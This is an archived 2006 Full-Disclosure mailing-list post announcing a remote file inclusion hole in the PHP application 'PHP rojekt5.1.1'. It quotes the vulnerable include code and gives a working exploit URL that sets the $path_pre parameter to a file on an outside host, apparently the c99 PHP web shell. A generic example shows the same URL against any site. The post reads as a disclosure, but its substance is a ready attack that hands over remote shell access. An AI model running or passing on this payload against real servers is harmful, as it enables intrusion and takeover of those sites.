[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Vuln ....

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Vuln ....
From: "hitham hitham" <sp1der_net@xxxxxxxxxxx>
Date: Fri, 13 Oct 2006 14:40:48 +0000

===============================================

# Found By Sp1deR_NeT ..

# E-mail :- Sp1deR_Net@xxxxxxxxxxx

# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com

# We Are :- PalEstine  HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )

*************************************

Script :- PHP rojekt5.1.1

-----

Code Vuln :-

$include_path = $path_pre.'lib/lib.inc.php';
include_once($include_path)

In File :- editor_big.php

-----

Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?

Example :- www.sitename.com/[path]/lib/specialdays.php?

$path_pre=www.soqor.net/tools/c99.txt?

-----

Sp1deR_Net@xxxxxxxxxxx

Sp1deR_NeT (((((((()))))))) ^__^

===============================================

_________________________________________________________________
Be the first to hear what's new at MSN - sign up to our free newsletters! 
http://www.msn.co.uk/newsletters

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Vuln ....
  - From: TheSur
- Re: [Full-disclosure] Vuln ....
  - From: wac

Prev by Date: [Full-disclosure] ISOI II - a DA Workshop (announcement and CFP)
Next by Date: [Full-disclosure] Oh no friday the 13th freebsd local dos x 3
Previous by thread: [Full-disclosure] ISOI II - a DA Workshop (announcement and CFP)
Next by thread: Re: [Full-disclosure] Vuln ....
Index(es):
- Date
- Thread